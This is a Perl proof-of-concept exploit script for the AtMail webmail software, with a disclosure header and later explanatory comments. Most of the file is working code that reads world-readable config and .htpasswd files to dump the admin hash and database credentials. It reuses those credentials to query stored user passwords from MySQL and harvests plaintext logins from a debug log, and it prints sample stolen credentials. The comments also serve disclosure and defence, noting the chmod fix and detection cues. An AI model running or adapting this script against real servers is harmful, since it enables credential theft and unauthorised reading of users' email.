#!/usr/bin/perl ################################################################################ # # LEGAL: # Permission is granted to freely reproduce this document in its entirety # under the condition that the contents are not altered in any way. # milw0rm IS permitted to add their standard footer: // milw0rm.com / date # Permission to view or reproduce this file is NOT granted to any # individual with the first name Gadi and the last name Evron, due to the # prior history of at least 1 individual with this name of making false # claims that researchers notified them about recently released exploits. # # PRODUCT: # AtMail - atmail.com # # VENDOR: # CalaCode - calacode.com # # DOWNLOAD: # http://atmail.org/download/atmailopen.tgz # http://atmail.com/demo/atmailphpdemo.tgz # # PROBLEM: # World readable files in the default install lead to sensitive # information disclosure, loss of integrity. # # SOLUTION: # chmod 640 /path/to/Config.php /path/to/.htpasswd # # NOTIFICATION: # 5/27/2008 - Several emails were sent back and forth, explaining how the # world readable Config.php issue could be abused. Multiple subsequent # attempts to obtain a status update from the vendor were unreplied to. # It's now 07/29/2008. Instead of taking a few moments of their time to # bring the level of security of the servers this software is installed # on back up to the same level it was BEFORE this software was installed # (excluding any other vulnerabilities that may exist in this software), # the vendor is happily pushing their product at HostingCon at this time. # (JULY 28-30, 2008). # # STATUS: # Not fixed. # # USAGE: # ./atmail.pl # # or simply use it as a CGI script. The vendor claims that ssh access is # required to abuse this issue. What they really mean is that all someone # needs is the ability to invoke a few commands from the shell. This is # easily done in countless ways without requiring authentication via ssh. 
#
# +----------------------------------------------------+
# | WEBADMIN USER CREDENTIALS (.htpasswd) |
# +----------------------------------------------------+
# admin:$apr1$L.BPJMnK$sjep5SUN4PG5A.Anw5/Id0
#
# +----------------------------------------------------+
# | DATABASE CREDENTIALS (Config.php) |
# +----------------------------------------------------+
# USER: atmail
# PASS: AF4hubB493
# HOST: localhost
#
# +----------------------------------------------------+
# | CLIENT CREDENTIALS (MySQL) |
# +----------------------------------------------------+
# USER: alice@atmail.com PASS: atmail
# USER: bob@atmail.com PASS: doesn't
# USER: carol@atmail.com PASS: getit
#
# +----------------------------------------------------+
# | MORE CLIENT CREDENTIALS (/tmp/popimap_debug) |
# +----------------------------------------------------+
# USER: alice PASS: atmail
# USER: bob PASS: doesn't
# USER: carol PASS: getit
#
#
# ADDED BONUS: client information persists in the database even after the user
# has logged off.
#
# To make this code work, you must fill in the paths. I don't condone
# malicious use of the information provided in this script, just as I don't
# condone vendor complacency.
#
# If you have found any of this information to be useful to you or someone
# you know, PLEASE consider donating to the Julie Amero Defense Fund:
#
# Official Blog
# http://julieamer.blogspot.com
#
# Trial Transcript
# http://julieamero.blogspot.com
#
# http://google.com/search?q=julie+amero
#
# and/or contacting news outlets, state legislators, the prosecution, etc and
# letting them know your thoughts in a polite and professional manner.
#
################################################################################
#
# Proof of concept for the PROBLEM described above.  The script only reads the
# files the default install leaves world readable (and the data those files
# lead on to) and echoes them as text/plain, which is why it works unchanged
# from a shell or as a CGI.  The mitigation is the permission change under
# SOLUTION: once Config.php and .htpasswd are mode 640 (and the debug log is
# off or private), every section below falls through its failed open() and
# prints nothing.
print "Content-type: text/plain\n\n";

use strict;
use warnings;

# Install-specific paths.  The file names were left as empty strings on
# purpose ("you must fill in the paths" above); presumably the .htpasswd and
# Config.php names from SOLUTION belong in the two '' suffixes.  Run as a CGI
# there is no argument, so $atmail_path is '' unless it is hard-coded here.
my $atmail_path          = shift || '';
my $atmail_htpasswd_path = $atmail_path . '';
my $atmail_config_path   = $atmail_path . '';
my $atmail_popimap_debug = '';    # NOTE: declared but never used; the debug
                                  # log path is hard-coded further down
my ( $sql_user, $sql_pass, $sql_host );    # parsed from Config.php below;
                                           # stay undef if it is unreadable

# '' is never an existing path, so a missing argument dies here before any
# file is touched.
-e $atmail_path or die "$atmail_path does not exist\n";

###############################################################################
# For logging into https://example.com/atmail/webadmin
###############################################################################
# The webadmin .htpasswd is dumped verbatim, nothing is parsed.  A failed
# open (file absent, or no longer world readable) skips the whole section.
if ( open my $atmail_htpasswd_path_fh, '<', $atmail_htpasswd_path ) {
    print_line();
    print "|\tWEBADMIN USER CREDENTIALS (.htpasswd) |\n";
    print_line();
    while ( <$atmail_htpasswd_path_fh> ) {
        print;    # prints $_, the current line, unchanged
    }
    close $atmail_htpasswd_path_fh;
    print "\n";
}

###############################################################################
# For accessing the atmail db
###############################################################################
# Pulls the three database settings out of Config.php.  Each pattern matches
# the PHP array entry  sql_user' => 'value',  anywhere on a line: under /x
# each \s is exactly one whitespace character, /i makes the key name case
# insensitive, and the greedy (.*) runs to the last  ',  on the line.  The
# last match in the file wins.
if ( open my $atmail_config_fh, '<', $atmail_config_path ) {
    print_line();
    print "|\tDATABASE CREDENTIALS (Config.php) |\n";
    print_line();
    while ( <$atmail_config_fh> ) {
        $sql_user = $1 if ( m{ sql_user ' \s => \s ' (.*) ' , }ixms );
        $sql_pass = $1 if ( m{ sql_pass ' \s => \s ' (.*) ' , }ixms );
        $sql_host = $1 if ( m{ sql_host ' \s => \s ' (.*) ' , }ixms );
    }
    close $atmail_config_fh;
    # A setting the file did not define interpolates as undef (a warning
    # under `use warnings`) and prints as an empty field.
    print "USER: $sql_user\nPASS: $sql_pass\nHOST: $sql_host\n";
    print "\n";
}

###############################################################################
# For reading grandma's email
###############################################################################
# The credentials read from Config.php are reused to query the UserSession
# table, which is how a readable config file leads on to the mail users
# themselves (the "loss of integrity" in PROBLEM).  "\\G" in a double-quoted
# string is the two characters \G, mysql's terminator for one-column-per-line
# output, which the Account:/Password: matches below depend on.
#
# Defender's note: this is one string handed to a shell (the quotes and * in
# it guarantee /bin/sh is involved), so the database password is visible on
# the command line to anything listing processes, and any shell metacharacter
# in the parsed values is interpreted.  If the Config.php block above did not
# run, all three variables are undef and a bare `mysql -h  -u  -p atmail` is
# attempted, which only produces warnings.  A mysql connection to UserSession
# from an unexpected OS user or host is the footprint worth alerting on.
my $sessions = "mysql -h $sql_host -u $sql_user -p$sql_pass atmail -e 'select * from UserSession \\G'";

if ( open my $mysql_fh, '-|', $sessions ) {
    print_line();
    print "|\tCLIENT CREDENTIALS (MySQL) |\n";
    print_line();
    # Assumes the UserSession rows have Account and Password columns, each
    # printed on its own line by \G; an Account line opens a USER entry and
    # the following Password line closes it.  TODO confirm against the schema.
    while ( <$mysql_fh> ) {
        if ( m{ Account: \s (\S+) }xms ) {
            print "USER: $1\t";
        }
        elsif ( m{ Password: \s (\S+) }xms ) {
            print "PASS: $1\n";
        }
    }
    close $mysql_fh;
    print "\n";
}

###############################################################################
# Debugging is not enabled by default, and you do have the choice of
# configuring the location of the debug log. The default is /tmp/popimap_debug
# which also presents a symlink attack issue if left to the default setting.
###############################################################################
# The path is hard-coded; $atmail_popimap_debug above is not consulted.  Lines
# prefixed  C:  (presumably the client side of the POP/IMAP dialogue) that
# carry a LOGIN command hold a plaintext username and password, so the issue
# is debug output landing in a world readable file under /tmp.  Turning
# debugging off, or logging to a private directory, removes this section's
# input.
if ( open my $popimap_debug_fh, '<', '/tmp/popimap_debug' ) {
    my %accounts;
    print_line();
    print "|\tMORE CLIENT CREDENTIALS (/tmp/popimap_debug) |\n";
    print_line();
    my ( $popimap_debug_user, $popimap_debug_pass );    # NOTE: unused; %accounts holds the pairs
    while ( <$popimap_debug_fh> ) {
        # Matches  C: ATMAIL00 LOGIN "user" "pass"  at the start of a line
        # (\A, case insensitive).  Both captures are greedy, so a literal
        # quote inside either value moves where the split lands; the last
        # LOGIN seen for a user overwrites earlier ones.
        if ( m{ \A C: \s ATMAIL00 \s LOGIN \s "(.*)" \s "(.*)" }ixms ) {
            $accounts{$1} = $2;
        }
    }
    close $popimap_debug_fh;
    # each() yields the pairs in hash order, i.e. no particular order.
    while ( my ( $user, $pass ) = each ( %accounts ) ) {
        print "USER: $user\tPASS: $pass\n";
    }
    print "\n";
}

# Prints the horizontal rule drawn above and below each section heading.
sub print_line {
    print "+----------------------------------------------------+\n";
}